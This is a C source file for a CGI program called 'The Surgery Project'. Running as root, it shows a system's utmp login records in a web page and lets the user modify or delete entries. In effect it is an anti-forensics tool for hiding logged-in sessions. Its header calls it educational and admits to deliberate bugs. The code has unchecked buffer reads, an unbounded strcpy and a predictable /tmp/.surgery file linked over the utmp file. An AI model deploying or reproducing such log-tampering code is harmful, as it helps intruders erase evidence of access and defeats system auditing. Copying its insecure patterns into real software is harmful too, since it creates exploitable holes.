
/* The Surgery Project - Web-based UTMP Modification
   - missnglnk@tribune.intranova.net
     http://tribune.intranova.net

   This file is for educational purposes only. I hope
   you heed these words or the blood-thirsty BSD
   daemon will get you in your sleep, I hear he's
   worse than the infamous boogeyman and all the
   monsters under your bed combined.

   Make sure you edit surgery.h and change the HTML
   header and footer locations, tweak MAX_HTML_LEN
   if you absolutely have to.

   This works as a CGI program, fix your webserver
   accordingly. Don't feed a null/blank argument
   to anything while making a modification, else
   you're looking at a nice core dump. (What makes
   you think I'd make a completely functional
   program for you? Remember, it's educational).

   This is also called find-and-fix-the-bugs.c
   Bonus points if you can find all of them.

   Compile:
    cc -o surgery.cgi surgery.c
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/sysctl.h>
#include <sys/param.h>
#include <kvm.h>
#include <fcntl.h>
#include <utmp.h>
#include <unistd.h>
#include <sys/utsname.h>
#include <sys/time.h>
#include "surgery.h"

extern int errno;

int main(int argc, char **argv)
{
	FILE 		*futmp, *html, *temputmp;
	struct utmp 	utmp;
	char 		htmldata[MAX_HTML_LEN], *mycginame, *myservname, 
			*querystr, *keypair[16], *tempkey[16], *tempval[16], 
			*tempdata, cgibuf[32768], varbuf[32768], hexstr[3], 
			*temppair[16], username[UT_NAMESIZE], 
			from[UT_HOSTSIZE], console[UT_LINESIZE], *dataend;

	int 		i = 0, x = 0, y = 0, action, record, update;
	double 		mylen = 0;

	if (getuid() != 0) {
		if (seteuid(0) != 0) {
			perror("seteuid()");
			return -1;
		}
	}

	if ((tempdata = getenv("REQUEST_METHOD")) == NULL) {
		perror("getenv()");
		return -1;
	}

	if ((mycginame = getenv("SCRIPT_NAME")) == NULL) {
		perror("getenv()");
		return -1;
	}

	if ((myservname = getenv("SERVER_NAME")) == NULL) {
		perror("getenv()");
		return -1;
	}

	if (strcmp(tempdata, "POST") == 0) {
		if ((tempdata = getenv("CONTENT_LENGTH")) != NULL) {
			mylen = strtol(tempdata, &dataend, 10);
			tempdata = NULL;
		}

		if (mylen != 0) {
			fread(cgibuf, mylen, 1, stdin);

			for (x = 0, y = 0; x < strlen(cgibuf); x++, y++) {
				switch (cgibuf[x]) {
					case '+':
						varbuf[y] = ' ';
						break;

					case '%':
						strncpy(hexstr, &cgibuf[x + 1], 2);
	
						x += 2;

						if(((strcmp(hexstr, "26") == 0)) || ((strcmp(hexstr, "3D") == 0))) {
							varbuf[y] = '%';
							y++;

							strcpy(varbuf, hexstr);
							y += 2;
							break;
						}

						varbuf[y] = (char)strtol(hexstr, NULL, 16);
						break;

					default:
						varbuf[y] = cgibuf[x];
						break;
				}
			}
	
			x = y = 0;

			tempdata = strtok(varbuf, "&");
			keypair[x] = tempdata;

			while ((tempdata = strtok(NULL, "&")) != NULL) {
				x++;
			 	keypair[x] = tempdata;
			}

			tempkey[0] = strtok(keypair[0], "=");
			tempval[0] = strtok(NULL, "=");

			for (y = 1; y <= x; y++) {
				tempkey[y] = strtok(keypair[y], "=");
				tempval[y] = strtok(NULL, "=");
			}

			for (y = 0; y <= x; y++) {
				if (strcmp(tempkey[y], "action") == 0) {
					if (strcmp(tempval[y], "modify") == 0) {
						action = 1;
					}

					if (strcmp(tempval[y], "delete") == 0) {
						action = 2;
					}

					if (strcmp(tempval[y], "update") == 0) {
						action = 3;
					}
				}

				if (strcmp(tempkey[y], "username") == 0) {
					strncpy(username, tempval[y], sizeof(username));
				}

				if (strcmp(tempkey[y], "from") == 0) {
					strncpy(from, tempval[y], sizeof(from));
				}

				if (strcmp(tempkey[y], "console") == 0) {
					strncpy(console, tempval[y], sizeof(console));
				}

				if (strcmp(tempkey[y], "record") == 0) {
					record = atoi(tempval[y]);
				}
			}
		}
	} else { 
		if (((querystr = getenv("QUERY_STRING")) != NULL) && querystr[0] != '\0') {
			x = i = 0;

			tempdata = strtok(querystr, "&");
			keypair[i] = tempdata;

			while((tempdata = strtok(NULL, "&")) != NULL) {
				i++;
				keypair[i] = tempdata;
			}

			tempkey[0] = strtok(keypair[0], "=");
			tempval[0] = strtok(NULL, "=");

			for (x = 1; x <= i; x++) {
				tempkey[x] = strtok(keypair[x], "=");
				tempval[x] = strtok(NULL, "=");
			}

			for (x = 0; x <= i; x++) {
				if (strcmp(tempkey[x], "action") == 0) {
					if (strcmp(tempval[x], "modify") == 0) {
						action = 1;
					}

					if (strcmp(tempval[x], "delete") == 0) {
						action = 2;
					}

					if (strcmp(tempval[x], "update") == 0) {
						action = 3;
					}
				}

				if (strcmp(tempkey[x], "record") == 0) {
					record = atoi(tempval[x]);
				}
			}
		}
	}

	if (action == 0) {
		if ((futmp = fopen(_PATH_UTMP, "r")) == NULL) {
			perror("fopen()");
			return -1;
		}

		if ((html = fopen(HTML_HEADER, "r")) == NULL) {
			perror("fopen()");
			return -1;
		}

		fread(htmldata, 1, MAX_HTML_LEN, html);
		printf("%s", htmldata);

		bzero(htmldata, sizeof(htmldata));

		if (fclose(html) < 0) {
			perror("fclose()");
			return -1;
		}

		printf("<br>\n");
		printf("<table border = \"0\" cellspacing = \"1\" cellpadding = \"1\" width = \"450\">\n");
		printf(" <tr>\n");
		printf("  <td width = \"20%\">\n");
		printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
		printf("    <b>Username</b>\n");
		printf("   </font>\n");
		printf("  </td>\n");

		printf("  <td width = \"20%\">\n");
		printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
		printf("    <b>From</b>\n");
		printf("   </font>\n");
		printf("  </td>\n");

		printf("  <td width = \"20%\">\n");
		printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
		printf("    <b>Console</b>\n");
		printf("   </font>\n");
		printf("  </td>\n");

		printf("  <td width = \"20%\">\n");
		printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
		printf("    <b>Date/Time</b>\n");
		printf("   </font>\n");
		printf("  </td>\n");

		printf("  <td width = \"20%\">\n");
		printf("   &nbsp;\n");
		printf("  </td>\n");
		printf(" </tr>\n");

		for (i = 0; fread(&utmp, 1, sizeof(utmp), futmp);) {
			if (utmp.ut_name[0] != '\0') {
				if (utmp.ut_host[0] == '\0') {
					strncpy(utmp.ut_host, "Local Console", sizeof(utmp.ut_host));
				}

				if (utmp.ut_host[0] == ':') {
					strncpy(utmp.ut_host, "X Terminal", sizeof(utmp.ut_host));
				}

				i++;
				printf(" <tr>\n");
				printf("  <td>\n");
				printf("   <font face = \"helvetica\" size = \"-1\" color = \"#FFFFFF\">\n");
				printf("    %s\n", utmp.ut_name);
			        printf("   </font>\n");
				printf("  </td>\n");
				printf("  <td>\n");
				printf("   <font face = \"helvetica\" size = \"-1\" color = \"#FFFFFF\">\n");
				printf("    %s\n", utmp.ut_host);
			        printf("   </font>\n");
				printf("  </td>\n");

				printf("  <td>\n");
				printf("   <font face = \"helvetica\" size = \"-1\" color = \"#FFFFFF\">\n");
				printf("    %s\n", utmp.ut_line);
			        printf("   </font>\n");
				printf("  </td>\n");

				printf("  <td>\n");
				printf("   <font face = \"helvetica\" size = \"-1\" color = \"#FFFFFF\">\n");
				printf("    %s", ctime(&utmp.ut_time));
			        printf("   </font>\n");
				printf("  </td>\n");

				printf("  <td>\n");
				printf("   <div align = \"center\">\n");
				printf("    <font face = \"helvetica\" size = \"-1\" color = \"#FFFFFF\">\n");
				printf("     [ <a href = \"http://%s%s?action=modify&record=%d\">Modify</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href = \"http://%s%s?action=delete&record=%d\">Delete</a> ]\n", myservname, mycginame, i, myservname, mycginame, i);
			        printf("    </font>\n");
				printf("   </div>\n");
				printf("  </td>\n");
				printf(" </tr>\n");
			}
		}

		printf("</table>\n");
		printf("<br>\n");

		if ((html = fopen(HTML_FOOTER, "r")) == NULL) {
			perror("fopen()");
			return -1;
		}

		fread(htmldata, 1, MAX_HTML_LEN, html);
		printf("%s", htmldata);

		if (fclose(html) < 0) {
			perror("fclose()");
			return -1;
		}

		if (fclose(futmp) < 0) {
			perror("fclose()");
			return -1;
		}
	}

	if (action == 1) {
		if ((futmp = fopen(_PATH_UTMP, "r")) == NULL) {
			perror("fopen()");
			return -1;
		}

		if ((html = fopen(HTML_HEADER, "r")) == NULL) {
			perror("fopen()");
			return -1;
		}

		fread(htmldata, 1, MAX_HTML_LEN, html);
		printf("%s", htmldata);

		bzero(htmldata, sizeof(htmldata));

		if (fclose(html) < 0) {
			perror("fclose()");
			return -1;
		}

		for (i = 0; fread(&utmp, 1, sizeof(utmp), futmp);) {
			if (utmp.ut_name[0] != '\0') {
				i++;
				if (i == record) {
					printf("<table border = \"0\" cellspacing = \"1\" cellpadding = \"1\" width = \"400\">\n");
					printf("<form action = \"http://%s%s\" method = \"post\">\n", myservname, mycginame, record);
					printf("<input type = \"hidden\" name = \"action\" value = \"update\">\n");
					printf("<input type = \"hidden\" name = \"record\" value = \"%d\">\n", record);
					printf(" <tr>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
					printf("    <b>Username:</b>\n");
					printf("   </font>\n");
					printf("  </td>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <input type = \"text\" name = \"username\" value = \"%s\">\n", utmp.ut_name);
					printf("   </font>\n");
					printf("  </td>\n");
					printf(" </tr>\n");

					printf(" <tr>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
					printf("    <b>From:</b>\n");
					printf("   </font>\n");
					printf("  </td>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <input type = \"text\" name = \"from\" value = \"%s\">\n", utmp.ut_host);
					printf("   </font>\n");
					printf("  </td>\n");
					printf(" </tr>\n");

					printf(" <tr>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
					printf("    <b>Console:</b>\n");
					printf("   </font>\n");
					printf("  </td>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <input type = \"text\" name = \"console\" value = \"%s\">\n", utmp.ut_line);
					printf("   </font>\n");
					printf("  </td>\n");
					printf(" </tr>\n");

					printf(" <tr>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
					printf("    <b>Date:</b>\n");
					printf("   </font>\n");
					printf("  </td>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <font face = \"helvetica\" size = \"+0\" color = \"#FFFFFF\">\n");
					printf("    %s", ctime(&utmp.ut_time));
					printf("   </font>\n");
					printf("  </td>\n");
					printf(" </tr>\n");

					printf(" <tr>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <input type = \"submit\" value = \"Modify\">\n");
					printf("  </td>\n");
					printf("  <td width = \"50%\">\n");
					printf("   <input type = \"reset\" value = \"Reset\">\n");
					printf("  </td>\n");
					printf(" </tr>\n");
					printf("</form>\n");
				}
			}
		}

		printf("</table>\n");
		printf("<br>\n");

		if ((html = fopen(HTML_FOOTER, "r")) == NULL) {
			perror("fopen()");
			return -1;
		}

		fread(htmldata, 1, MAX_HTML_LEN, html);
		printf("%s", htmldata);

		if (fclose(html) < 0) {
			perror("fclose()");
			return -1;
		}

		if (fclose(futmp) < 0) {
			perror("fclose()");
			return -1;
		}
	} 
	
	if (action == 2) {
		if ((futmp = fopen(_PATH_UTMP, "r")) == NULL) {
			perror("fopen()");
			return -1;
		}

		if ((temputmp = fopen("/tmp/.surgery", "w+")) == NULL) {
			perror("fopen()");
			return -1;
		}

		for (i = 0; fread(&utmp, 1, sizeof(utmp), futmp);) {
			if (utmp.ut_name[0] != '\0') {
				i++;
				if (i != record) {
					fwrite(&utmp, 1, sizeof(utmp), temputmp);	
				}
			} else {
				fwrite(&utmp, 1, sizeof(utmp), temputmp);	
			}
		}

		if (fclose(temputmp) < 0) {
			perror("fclose()");
			return -1;
		}

		if (unlink(_PATH_UTMP) < 0) {
			perror("unlink()");
			return -1;
		}

		if (link("/tmp/.surgery", _PATH_UTMP) < 0) {
			perror("link()");
			return -1;
		}

		if (unlink("/tmp/.surgery") < 0) {
			perror("unlink()");
			return -1;
		}

		if (fclose(futmp) < 0) {
			perror("fclose()");
			return -1;
		}

		printf("Location: http://%s%s\n\n", myservname, mycginame);
	}

	if (action == 3) {
		if ((futmp = fopen(_PATH_UTMP, "r")) == NULL) {
			perror("fopen()");
			return -1;
		}

		if ((temputmp = fopen("/tmp/.surgery", "w+")) == NULL) {
			perror("fopen()");
			return -1;
		}

		for (i = 0; fread(&utmp, 1, sizeof(utmp), futmp);) {
			if (utmp.ut_name[0] != '\0') {
				i++;
				if (i != record) {
					fwrite(&utmp, 1, sizeof(utmp), temputmp);	
				} else {
					strncpy(utmp.ut_name, username, sizeof(utmp.ut_name));
					strncpy(utmp.ut_host, from, sizeof(utmp.ut_host));
					strncpy(utmp.ut_line, console, sizeof(utmp.ut_line));
					fwrite(&utmp, 1, sizeof(utmp), temputmp);	
				}
			} else {
				fwrite(&utmp, 1, sizeof(utmp), temputmp);	
			}
		}

		if (fclose(temputmp) < 0) {
			perror("fclose()");
			return -1;
		}

		if (unlink(_PATH_UTMP) < 0) {
			perror("unlink()");
			return -1;
		}

		if (link("/tmp/.surgery", _PATH_UTMP) < 0) {
			perror("link()");
			return -1;
		}

		if (unlink("/tmp/.surgery") < 0) {
			perror("unlink()");
			return -1;
		}

		if (fclose(futmp) < 0) {
			perror("fclose()");
			return -1;
		}

		printf("Location: http://%s%s\n\n", myservname, mycginame);
	}

	if (seteuid(getuid()) != 0) {
		perror("seteuid()");
		return -1;
	}

	return 0;
}
